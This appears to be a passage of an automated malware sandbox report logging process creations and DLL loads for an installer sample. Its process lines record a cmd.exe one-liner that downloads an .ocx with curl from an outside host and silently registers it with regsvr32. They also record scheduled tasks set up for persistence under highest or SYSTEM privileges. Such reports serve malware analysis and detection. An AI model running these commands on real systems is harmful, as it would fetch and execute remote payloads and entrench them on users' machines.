    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F574E926F0549E16F7448F5C9BE1C2BF C
    Source: C:\Users\user\Desktop\1.exeProcess created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="7448" CHAINERUIPROCESSID="7448Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\1.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1741399570 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\1.exe" AI_INSTALL="1"
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9539C2E5DC35A3081EC0BB575F66643E
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 208B5DB405716A1E55D335C3D35AEAD8 E Global\MSI0000
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Main\MainSoftware.exe "C:\Program Files (x86)\Main\MainSoftware.exe" Persistent
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f
    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /run /tn "MyPersistentApp_Hourly"
    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Program Files (x86)\Main\MainSoftware.exe "C:\Program Files (x86)\Main\MainSoftware.exe" Loop
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://qb-hos.pages.dev/page-2/?source_id=6
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f
    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Program Files (x86)\Main\Chop\Install.exe "C:\Program Files (x86)\Main\Chop\Install.exe"
    Source: unknownProcess created: C:\Program Files\Surfclub\Install.exe "C:\Program Files\Surfclub\Install.exe" install https://qb-hos.pages.dev/page-2/?source_id=6
    Source: C:\Program Files (x86)\Main\Chop\Install.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Program Files (x86)\Main\Chop\Install.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!""
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\219880.ocx"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\219880.ocx"
    Source: unknownProcess created: C:\Program Files\Surfclub\Install.exe "C:\Program Files\Surfclub\Install.exe" install https://qb-hos.pages.dev/page-2/?source_id=6
    Source: C:\Users\user\Desktop\1.exeProcess created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="7448" CHAINERUIPROCESSID="7448Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\1.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1741399570 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\1.exe" AI_INSTALL="1"Jump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F574E926F0549E16F7448F5C9BE1C2BF CJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9539C2E5DC35A3081EC0BB575F66643EJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 208B5DB405716A1E55D335C3D35AEAD8 E Global\MSI0000Jump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Main\MainSoftware.exe "C:\Program Files (x86)\Main\MainSoftware.exe" PersistentJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://qb-hos.pages.dev/page-2/?source_id=6Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /fJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /run /tn "MyPersistentApp_Hourly"Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Program Files (x86)\Main\Chop\Install.exe "C:\Program Files (x86)\Main\Chop\Install.exe"
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f
    Source: C:\Program Files (x86)\Main\Chop\Install.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!""
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\219880.ocx"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\219880.ocx"
    Source: C:\Users\user\Desktop\1.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: davhlpr.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: lpk.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msihnd.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: atlthunk.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: explorerframe.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: davhlpr.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: lpk.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msihnd.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\Desktop\1.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
